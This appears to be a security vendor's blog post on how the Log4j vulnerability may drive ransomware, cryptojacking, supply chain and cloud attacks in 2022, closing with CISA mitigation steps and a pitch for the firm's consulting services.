How the Log4j Flaw will Increase Cyber Threats in 2022

Our last post discussed some of the IT trends we expect to shape the industry and customer objectives in the coming year. Since the number 1 priority will be Security, let’s take a deeper dive into what the cybersecurity landscape will look like in 2022.

The odds are high that 2022 will be worse than 2021, which saw huge increases in some forms of cybercrime. One factor will be the log4j vulnerability, which was identified in November 2021. Log4j is an open-source function used in countless Java apps to handle logging functions. It is designed to log all kinds of application events, such as errors and messages from users. Security researchers discovered that hackers could trick log4j into saving specific character strings, making it possible to execute malicious code.

Log4j has been compared to the 2014 Heartbleed and Shellshock exploits because of the extent of the impact. No one knows how many systems are vulnerable to the log4j flaw. Many applications call the function indirectly through other Java libraries.

Here are four ways log4j could affect cybersecurity in the coming year:

  1. Ransomware

According to estimates by one security firm, there were more than 700 million ransomware attacks in 2021, an increase of 130 percent over 2020. Although some experts expect the number of attacks to level off, ransom demands and recovery costs will likely rise as more attackers use data exfiltration and encryption to force victims to pay. The log4j flaw will make it easier for attackers to inject malicious code while bypassing anti-malware defenses.

2. Cryptojacking

Cryptojacking attacks increased in 2021 along with rises in the cryptocurrency market, and the log4j flaw led to a spike in attempts to inject crypto mining software into corporate systems. Cryptomining requires significant compute resources and electricity, and criminals steal these resources from unsuspecting victims. Traditionally, cryptojacking attacks targeted consumers, but now criminals are going after more powerful PCs and servers in the corporate environment. Cryptojacking increases energy consumption, hogs network bandwidth, saps performance, and stresses hardware. Increasingly, cryptojacking software also includes malware that compromises systems and exfiltrates data. 

3. Supply Chain Attacks

In a supply chain attack, hackers exploit a vulnerability in one organization’s security to compromise systems throughout the supply chain. The SolarWinds and Kaseya attacks are high-profile examples of malware distributed through a weakness in software and distributed to multiple organizations. According to an analysis by the Identity Theft Resource Center, supply chain attacks increased 42 percent in the U.S. in the first quarter of 2021 alone. Because log4j is used in a wide range of software, it opens up the risk of massive supply chain attacks impacting thousands of organizations.

4. Attacks on Cloud Resources

The growing adoption of cloud platforms has already led to a sharp rise in cloud threats, with IBM X-Force researchers reporting 150 percent growth over the past five years. Almost half of the 2,500 known vulnerabilities were discovered in the past 18 months. The log4j flaw will likely increase the exposure of cloud resources, as many Java applications are deployed in the cloud. Organizations often fail to recognize their responsibilities when it comes to security. Cloud misconfigurations and a failure to take advantage of available security tools are leading causes of cloud security breaches.

How to Protect against Log4j Exploitation

According to the Apache Log4j Vulnerability Guidance form CISA, some of the immediate actions that your organization can take include:

• Discover all internet-facing assets that allow data inputs and use Log4j Java library anywhere in the stack.

• Discover all assets that use the Log4j library.

• Update or isolate affected assets. Assume compromise, identify common post-exploit sources and activity, and hunt for signs of malicious activity.

• Monitor for odd traffic patterns (e.g., JNDI LDAP/RMI outbound traffic, DMZ systems initiating outbound connections).

How Rahi Can Help

While version upgrades and patch fixes seem to be the only available solution, there’s no substitute for an iron-clad enterprise security system. Whether designing, deploying, or consulting on bolstering the existing security systems, the Rahi team can help fill in the gaps by working with your security team to chart the best-suited solution for your use case.

Rahi’s experts use our ELEVATE methodology to help customers develop comprehensive security strategies. From assessment through planning, implementation, and long-term management, we’re here to help you identify risks and vulnerabilities and ensure that your mission-critical systems and data are protected.

Interested in the topic? Read also: